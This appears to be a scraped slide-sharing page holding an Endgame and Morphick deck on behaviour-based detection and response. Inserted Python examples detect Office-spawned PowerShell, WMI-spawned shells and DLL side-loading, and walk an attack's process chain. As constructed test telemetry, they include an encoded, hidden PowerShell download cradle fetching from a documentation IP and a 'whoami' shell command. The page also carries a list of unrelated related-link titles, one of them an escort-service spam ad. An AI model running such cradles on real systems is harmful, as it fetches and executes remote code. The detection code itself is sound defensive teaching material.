Three Considerations To Amplify Your Detection and Response Program
with Mark Dufresne and David Lavinder
Confidential and Proprietary
Who Are We?
Mark Dufresne (@mark_dufresne)
Endgame - Director of Threat
Research and Adversary Prevention
David Lavinder (@dllavinder)
Morphick - Vice President,
Threat Intelligence
Prior: 13 years at NSA, Operations Chief
for Offensive and Defensive Cyber Ops
Prior: 7 years as Air Force Digital Network
Intelligence Principal Intelligence Analyst
Topics
§  3 Key Challenges to a Detection and Response Program
–  Advanced TTPs
–  Analytical Tradecraft
–  Detection Methodologies
§  The Morphick / Endgame Approach
–  Beyond IOC/Signature Detection
–  Uncovering the Full Story
–  Integrated Prevention, Detection, and Response
Advanced TTPs
§  New Attacks > Existing Defenses
–  Paradigm Shift – Attackers are People
§  Designed to defeat off-the-shelf defense
–  Advanced Evasion Techniques
–  Custom rolled malware
The Analytical Tradecraft Gap
§  In-memory Attacks
–  DLL side-loading
–  Malware-less attacks
§  Malicious use of Admin Tools
–  PowerShell
–  WMI
The Detection Problem
The technology problem:
§  Limited enterprise-wide visibility
§  Complex tools that don’t work well together
§  Static defenses that do not adapt
§  Difficult to deploy and maintain solutions
The people problem:
§  SOC analyst talent shortage
§  Alert fatigue
§  Fighting an asymmetric battle
§  Unprepared for an incident
So What Do I Need?
The right tradecraft
armed with
The right technology
The Right Technology
§  Detection
–  Beyond IOC/Signature-based detection
§  Visibility
–  Enabling visibility and rapid detection of unknown advanced attackers
§  Prevention
–  Automatically protecting against the vast majority of malicious activity
Beyond IOC/Signature-Based Detection
§  Signatures (IOCs) aren’t enough
§  Attackers adjust tools and tradecraft
§  Attackers cycle infrastructure
§  Attackers live off the land
Good for pivoting.
Bad foundation for protection.
WHAT ABOUT THE UNKNOWN?
So What Should I Do Instead?
You need a different method of detection
§  Focused on behaviors/techniques
§  At each stage of the attacker lifecycle
§  Layered and working together
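What a technique-focused detection looks like in practice, as an added example that is not code from the deck or from Endgame or Morphick: three rules run over constructed endpoint telemetry (process-creation and image-load records whose field names are assumptions, loosely modelled on Sysmon), one for each technique the deck calls out. An Office application spawning a script host with an encoded PowerShell command, the WMI provider host spawning a shell, and an executable outside the system directories loading an unsigned DLL that carries a system DLL's name. None of the rules keys on a hash, a file name or an IP address; the Office rule also decodes the -EncodedCommand blob so the analyst sees the download cradle rather than Base64.

```python
"""Technique-focused detection over endpoint process telemetry.

Added example, not code from the deck or from either vendor. The records below
are constructed and their field names are assumptions, loosely modelled on
Sysmon process-creation (ID 1) and image-load (ID 7) events.
"""
import base64
import ntpath
import re

# Constructed: a hidden PowerShell download cradle as it appears in -EncodedCommand
ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')".encode("utf-16-le")
).decode()

EVENTS = [
    # benign: desktop shell launches a browser
    {"type": "process", "pid": 3000, "ppid": 1200, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"type": "process", "pid": 3050, "ppid": 3000,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmdline": "chrome.exe"},
    # benign: a service loads the real version.dll from System32
    {"type": "imageload", "pid": 900, "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\Windows\System32\version.dll", "signed": True},
    # malicious: macro document launches a hidden, encoded PowerShell command
    {"type": "process", "pid": 4100, "ppid": 3000,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n invoice.docm"},
    {"type": "process", "pid": 4108, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENC_PAYLOAD},
    # malicious: the WMI provider host spawns a shell (remote "process call create")
    {"type": "process", "pid": 920, "ppid": 900, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "WmiPrvSE.exe -secured -Embedding"},
    {"type": "process", "pid": 4200, "ppid": 920, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt"},
    # malicious: a vendor binary dropped in Temp loads an unsigned version.dll beside it
    {"type": "imageload", "pid": 4300, "image": r"C:\Users\alice\AppData\Local\Temp\Updater.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Temp\version.dll", "signed": False},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# DLL names that applications commonly resolve from their own directory first,
# which is what makes them side-loadable (assumed short list for the example)
SIDELOAD_DLLS = {"version.dll", "dbghelp.dll", "wtsapi32.dll", "cryptbase.dll", "userenv.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    return ntpath.basename(path).lower()


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument (Base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Run the technique rules over the telemetry and return one finding per hit."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = []
    for e in events:
        if e["type"] == "process":
            parent = procs.get(e["ppid"])
            parent_name = basename(parent["image"]) if parent else ""
            child = basename(e["image"])
            if parent_name in OFFICE_APPS and child in SCRIPT_HOSTS:
                # surface the decoded command so the analyst sees the cradle, not a blob
                findings.append({"technique": "office-spawns-script-host", "pid": e["pid"],
                                 "detail": decode_encoded_command(e["cmdline"]) or e["cmdline"]})
            elif parent_name == "wmiprvse.exe" and child in SCRIPT_HOSTS:
                findings.append({"technique": "wmi-spawned-shell", "pid": e["pid"],
                                 "detail": e["cmdline"]})
        elif e["type"] == "imageload":
            loaded = e["loaded"]
            if (basename(loaded) in SIDELOAD_DLLS and not e["signed"]
                    and not loaded.lower().startswith(SYSTEM_DIRS)):
                findings.append({"technique": "dll-side-loading", "pid": e["pid"],
                                 "detail": loaded})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f['technique']:28} pid={f['pid']:<5} {f['detail']}")
```

Each rule fires on a relationship (parent and child, loader and loaded module, location and signature) rather than on a specific artifact, so swapping the payload, the file name or the infrastructure does not evade it. Changing the technique does: launching the same cradle from a scheduled task instead of from Word walks past the first rule, and a signed side-loaded DLL walks past the third. That is why rules like these belong in a layered stack and not as the only detection.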
But EVERYONE is Saying “Behavior”
§  NGAV – malware and exploit prevention
§  But what about bypass and file-less attacks? Only part of the problem
§  Both EDR and NGAV are adding detection of behaviors
§  Capturing process actions and writing rules (IOAs)
§  Still a signature. Still brittle. Vulnerable to bypass.
§  Experts needed for configuration
This is still not the right mix
Gather Visibility – Endpoints and Network
§  You need full visibility on system events and other data
–  Persistence
–  Processes
–  Network
–  Users
–  More
§  A mountain of data doesn’t do you much good without analytics
–  Endgame provides sophisticated analytics to guide the hunt
–  Chatbot guides users through the hunt
–  Robust API allows for flexible and powerful access and enrichment
Gather Visibility - Memory
§  Memory is a permissive environment for attackers. Why?
–  Memory analysis doesn’t scale
–  Need to know what you are looking for (search based)
–  Until now…
§  Endgame technology
–  Patent-pending technology detects stealthy adversaries in memory in seconds, at scale
–  Detects process hollowing, thread hijacking, module hiding, and much more
§  Precise identification of suspicious memory and remediation
§  Follow on analytic actions such as extraction of IOCs
Behavioral Preventions
§  Exploits – Hardware and Software approaches
§  Macros – Detecting malicious execution of macros
§  Malware – Machine learning (Malwarescore™)
§  Kernel-level technique preventions
–  Atomic-level system state in the presence of malicious behaviors
–  More than streaming rules. Simple configuration, inline and hardened.
§  Ransomware
Layered prevention minimizes adversary’s capability to entrench
Much more than traditional AV
The Right Tradecraft
§  Analytical Pivoting
–  Discovering unknowns from knowns, across the kill chain
§  Generate Threat Intelligence
–  Extract as much intel from a positive detection event as possible
§  Harden Defenses
–  Update defenses with new intelligence
Visibility Across the Kill Chain
§  A security analyst’s job doesn’t END at detection, it BEGINS there
§  Take that single detection event and explore the kill chain
–  How did it get here?
–  What was it going to do next?
The Power of a Security Analyst
§  Discovering unknowns from knowns
–  Identifying missed detection opportunities
§  Telling the whole story
–  Tracing an event to earlier kill chain steps
§  Then BUILD IT BACK IN
§  The analysis tradecraft is getting lost amongst all the tools
§  Visibility is key, but good tradecraft unlocks the power of that visibility
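The pivoting workflow that the Right Tradecraft, Visibility Across the Kill Chain and Power of a Security Analyst slides describe, as an added example that is not the deck's own code: start from one alert (a PowerShell process on host WS01), walk the parent chain back to its root (how did it get here?), collect everything that process and its descendants did (what was it going to do next?), turn that activity into indicators, search the other hosts for those indicators (unknowns from knowns), and emit the parent/child pair as a new behaviour rule (build it back in). All telemetry is constructed; host names and hash values are placeholders and the IP addresses are from documentation ranges.

```python
"""From a single detection to the whole story, and back into the defenses.

Added example, not the deck's own code. All telemetry is constructed: host names
and hash values are placeholders and the IP addresses are from documentation ranges.
"""
from collections import defaultdict

EVENTS = [
    # WS01: the host the alert fired on (PowerShell spawned by Word)
    {"host": "WS01", "type": "process", "pid": 3000, "ppid": 1200, "image": "explorer.exe", "hash": "h_explorer"},
    {"host": "WS01", "type": "process", "pid": 4100, "ppid": 3000, "image": "WINWORD.EXE", "hash": "h_word"},
    {"host": "WS01", "type": "process", "pid": 4108, "ppid": 4100, "image": "powershell.exe", "hash": "h_ps"},
    {"host": "WS01", "type": "network", "pid": 4108, "dst": "203.0.113.7", "port": 80},
    {"host": "WS01", "type": "file", "pid": 4108, "path": r"C:\Users\alice\AppData\Roaming\svc.exe", "hash": "h_implant"},
    {"host": "WS01", "type": "process", "pid": 4150, "ppid": 4108, "image": "svc.exe", "hash": "h_implant"},
    {"host": "WS01", "type": "network", "pid": 4150, "dst": "198.51.100.23", "port": 443},
    # WS02: nothing alerted here, but the same implant is running and beaconing
    {"host": "WS02", "type": "process", "pid": 5010, "ppid": 800, "image": "svc.exe", "hash": "h_implant"},
    {"host": "WS02", "type": "network", "pid": 5010, "dst": "198.51.100.23", "port": 443},
    # WS03: ordinary browsing
    {"host": "WS03", "type": "process", "pid": 2200, "ppid": 900, "image": "chrome.exe", "hash": "h_chrome"},
    {"host": "WS03", "type": "network", "pid": 2200, "dst": "192.0.2.80", "port": 443},
]


def process_index(events, host):
    return {e["pid"]: e for e in events if e["host"] == host and e["type"] == "process"}


def ancestry(events, host, pid):
    """How did it get here? Follow ppid links to the root; returns images root-first."""
    procs = process_index(events, host)
    chain, seen = [], set()
    while pid in procs and pid not in seen:   # seen-set guards against pid-reuse loops
        seen.add(pid)
        chain.append(procs[pid]["image"])
        pid = procs[pid]["ppid"]
    return list(reversed(chain))


def descendants(events, host, pid):
    """What did it do next? The detected process and everything it spawned, transitively."""
    children = defaultdict(list)
    for p in process_index(events, host).values():
        children[p["ppid"]].append(p["pid"])
    tree, stack = set(), [pid]
    while stack:
        cur = stack.pop()
        if cur not in tree:
            tree.add(cur)
            stack.extend(children[cur])
    return tree


def extract_intel(events, host, pids):
    """Turn the chain's activity into indicators: contacted addresses and dropped-file hashes."""
    ips = {e["dst"] for e in events if e["host"] == host and e["type"] == "network" and e["pid"] in pids}
    dropped = {e["hash"] for e in events if e["host"] == host and e["type"] == "file" and e["pid"] in pids}
    return ips | dropped


def pivot(events, indicators, exclude_host):
    """Unknowns from knowns: every other host on which any extracted indicator appears."""
    hits = defaultdict(set)
    for e in events:
        if e["host"] == exclude_host:
            continue
        for key in ("dst", "hash"):
            if e.get(key) in indicators:
                hits[e["host"]].add(e[key])
    return dict(hits)


def investigate(events, host, pid):
    """Full workflow for one alert: trace back, trace forward, extract, pivot, build it back in."""
    chain = ancestry(events, host, pid)
    tree = descendants(events, host, pid)
    intel = extract_intel(events, host, tree)
    return {
        "chain": chain,
        "processes": tree,
        "indicators": intel,
        "also_seen_on": pivot(events, intel, host),
        # the missed detection opportunity, expressed as a parent/child behaviour rule
        "new_parent_child_rule": tuple(chain[-2:]),
    }


if __name__ == "__main__":
    from pprint import pprint
    pprint(investigate(EVENTS, "WS01", 4108))
```

The indicators are useful for exactly one thing here: finding WS02, where no rule fired. They are not what gets built back into the defenses. The parent/child pair is, because the next intrusion will use a different address and a different implant hash but very likely the same Word-to-PowerShell step.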
SOLUTION
§  Combination of Technology and Tradecraft
Technology provides layered behavioral prevention
Technology provides visibility and access
Tradecraft finds the remaining adversary
Tradecraft hardens defenses
Managed Endpoint Detection and Response (MEDR)
§  Continuous Endpoint Threat Monitoring & Advanced Prevention
§  Full Attack Cycle Threat Detection
§  Proactive, scalable Threat Hunting
§  Detailed Forensic Investigation and Threat Validation
§  NSA-CIRA Accredited Incident Response Services
Best-in-class Tech, Wrapped in Best-in-class Service
Interested in learning more?
Come see us at RSA
§  Endgame Booth, South Hall #1739
§  Morphick Booth, North Hall #5004
Schedule a Demo
§  Endgame
–  Ashwini Almad
–  AAlmad@Endgame.com
§  Morphick
–  Tom Doepker
–  Tom.Doepker@Morphick.com
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 

Three Considerations To Amplify Your Detection and Response Program

  • 1. Three Considerations To Amplify Your Detection and Response Program with Mark Dufresne and David Lavinder Confidential and Proprietary
  • 2. Who Are We? Mark Dufresne (@mark_dufresne) Endgame - Director of Threat Research and Adversary Prevention. Prior: 13 years at NSA, Operations Chief for Offensive and Defensive Cyber Ops. David Lavinder (@dllavinder) Morphick - Vice President, Threat Intelligence. Prior: 7 years as Air Force Digital Network Intelligence Principal Intelligence Analyst
  • 3. Topics §  3 Key Challenges to a Detection and Response Program –  Advanced TTPs –  Analytical Tradecraft –  Detection Methodologies §  The Morphick / Endgame Approach –  Beyond IOC/Signature Detection –  Uncovering the Full Story –  Integrated Prevention, Detection, and Response
  • 4. Advanced TTPs §  New Attacks > Existing Defenses –  Paradigm Shift – Attackers are People §  Designed to defeat off-the-shelf defense –  Advanced Evasion Techniques –  Custom rolled malware §  In-memory Attacks –  DLL side-loading –  Malware-less attacks §  Malicious use of Admin Tools –  PowerShell –  WMI
  • 5. The Analytical Tradecraft Gap
  • 6. The Detection Problem The technology problem: §  Limited enterprise-wide visibility §  Complex tools that don’t work well together §  Static defenses that do not adapt §  Difficult to deploy and maintain solutions The people problem: §  SOC analyst talent shortage §  Alert fatigue §  Fighting an asymmetric battle §  Unprepared for an incident
  • 7. So What Do I Need? The right tradecraft armed with the right technology
  • 8. The Right Technology §  Detection –  Beyond IOC/Signature-based detection §  Visibility –  Enabling visibility and rapid detection of unknown advanced attackers §  Prevention –  Automatically protecting against the vast majority of malicious activity
  • 9. Beyond IOC/Signature-Based Detection §  Signatures (IOCs) aren’t enough §  Attackers adjust tools and tradecraft §  Attackers cycle infrastructure §  Attackers live off the land Good for pivoting. Bad foundation for protection. WHAT ABOUT THE UNKNOWN?
  • 10. So What Should I Do Instead? You need a different method of detection: §  Focused on behaviors/techniques §  At each stage of the attacker lifecycle §  Layered and working together
  • 11. But EVERYONE is Saying “Behavior” §  NGAV – malware and exploit prevention §  But what about bypass and file-less attacks? Only part of the problem §  Both EDR and NGAV are adding detection of behaviors §  Capturing process actions and writing rules (IOAs) §  Still a signature. Still brittle. Vulnerable to bypass. §  Experts needed for configuration This is still not the right mix
  • 12. Gather Visibility – Endpoints and Network §  You need full visibility on system events and other data –  Persistence –  Processes –  Network –  Users –  More §  A mountain of data doesn’t do you much good without analytics –  Endgame provides sophisticated analytics to guide the hunt –  Chatbot guides users through the hunt –  Robust API allows for flexible and powerful access and enrichment
  • 13. Gather Visibility - Memory §  Memory is a permissive environment for attackers. Why? –  Memory analysis doesn’t scale –  Need to know what you are looking for (search based) –  Until now… §  Endgame technology –  Patent-pending technology detects stealthy adversaries in memory in seconds, at scale –  Detects process hollowing, thread hijacking, module hiding, and much more §  Precise identification of suspicious memory and remediation §  Follow-on analytic actions such as extraction of IOCs
  • 14. Behavioral Preventions §  Exploits – Hardware and Software approaches §  Macros – Detecting malicious execution of macros §  Malware – Machine learning (Malwarescore™) §  Kernel-level technique preventions –  Atomic-level system state in the presence of malicious behaviors –  More than streaming rules. Simple configuration, inline and hardened. §  Ransomware Layered prevention minimizes the adversary’s capability to entrench. Much more than traditional AV
  • 15. The Right Tradecraft §  Analytical Pivoting –  Discovering unknowns from knowns, across the kill chain §  Generate Threat Intelligence –  Extract as much intel from a positive detection event as possible §  Harden Defenses –  Update defenses with new intelligence
  • 16. Visibility Across the Kill Chain §  A security analyst’s job doesn’t END at detection, it BEGINS there §  Take that single detection event and explore the kill chain –  How did it get here? –  What was it going to do next?
  • 18. The Power of a Security Analyst §  Discovering unknowns from knowns –  Identifying missed detection opportunities §  Telling the whole story –  Tracing an event to earlier kill chain steps §  Then BUILD IT BACK IN §  The analysis tradecraft is getting lost amongst all the tools §  Visibility is key, but good tradecraft unlocks the power of that visibility
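The three detection styles contrasted in slides 9 through 11 (hash IOC, name-keyed IOA rule, technique-keyed behaviour rule) and the kill-chain pivot of slides 16 and 18, as an added example that is not code from Endgame or Morphick, run over a constructed process tree; the `orig_name` field assumes the sensor records each image's PE OriginalFilename.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # file name as launched on disk
    orig_name: str  # OriginalFilename from the PE version resource (assumed collected)
    cmdline: str
    sha256: str

# Constructed telemetry: Explorer -> Outlook -> Word -> renamed PowerShell -> wmic.
EVENTS = [
    ProcEvent(100, 1,   "explorer.exe", "EXPLORER.EXE",   "explorer.exe", "a1"),
    ProcEvent(200, 100, "outlook.exe",  "OUTLOOK.EXE",    "outlook.exe", "b2"),
    ProcEvent(300, 200, "winword.exe",  "WINWORD.EXE",    "winword.exe /n invoice.docm", "c3"),
    ProcEvent(400, 300, "update.exe",   "PowerShell.EXE", "update.exe -nop -w hidden -enc <constructed>", "d4"),
    ProcEvent(500, 400, "wmic.exe",     "wmic.exe",       "wmic.exe process list brief", "e5"),
]
KNOWN_BAD_SHA256 = {"constructed-hash-from-a-prior-incident"}  # the IOC list
OFFICE = {"WINWORD.EXE", "EXCEL.EXE", "OUTLOOK.EXE"}
SHELLS = {"POWERSHELL.EXE", "CMD.EXE", "WSCRIPT.EXE"}

def ioc_hits(events):
    """Signature/IOC match on hash: a recompiled binary has a new hash, so this misses."""
    return [e.pid for e in events if e.sha256 in KNOWN_BAD_SHA256]

def brittle_ioa_hits(events):
    """IOA rule keyed on the launched file name: a renamed copy is not seen."""
    by_pid = {e.pid: e for e in events}
    return [e.pid for e in events
            if (p := by_pid.get(e.ppid)) and p.image.upper() in OFFICE
            and e.image.upper() in SHELLS]

def behaviour_hits(events):
    """Office process spawning a shell, keyed on the PE original name, not the file name."""
    by_pid = {e.pid: e for e in events}
    return [e.pid for e in events
            if (p := by_pid.get(e.ppid)) and p.orig_name.upper() in OFFICE
            and e.orig_name.upper() in SHELLS]

def pivot(events, pid):
    """From one detection, walk back up the kill chain (how did it get here?)
    and forward to its children (what was it going to do next?)."""
    by_pid = {e.pid: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur:
        chain.insert(0, cur.image)
        cur = by_pid.get(cur.ppid)
    return chain, [e.image for e in events if e.ppid == pid]
```

Only the technique-keyed rule fires on the sample, and `pivot` then recovers the Outlook-to-Word delivery path behind it and the WMI activity that followed.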
  • 19. SOLUTION §  Combination of Technology and Tradecraft –  Technology provides layered behavioral prevention –  Technology provides visibility and access –  Tradecraft finds the remaining adversary –  Tradecraft hardens defenses
  • 20. Managed Endpoint Detection and Response (MEDR) §  Continuous Endpoint Threat Monitoring & Advanced Prevention §  Full Attack Cycle Threat Detection §  Proactive, scalable Threat Hunting §  Detailed Forensic Investigation and Threat Validation §  NSA-CIRA Accredited Incident Response Services Best-in-class Tech, Wrapped in Best-in-class Service
  • 21. Interested in learning more? Come see us at RSA §  Endgame Booth, South Hall #1739 §  Morphick Booth, North Hall #5004 Schedule a Demo §  Endgame –  Ashwini Almad –  AAlmad@Endgame.com §  Morphick –  Tom Doepker –  Tom.Doepker@Morphick.com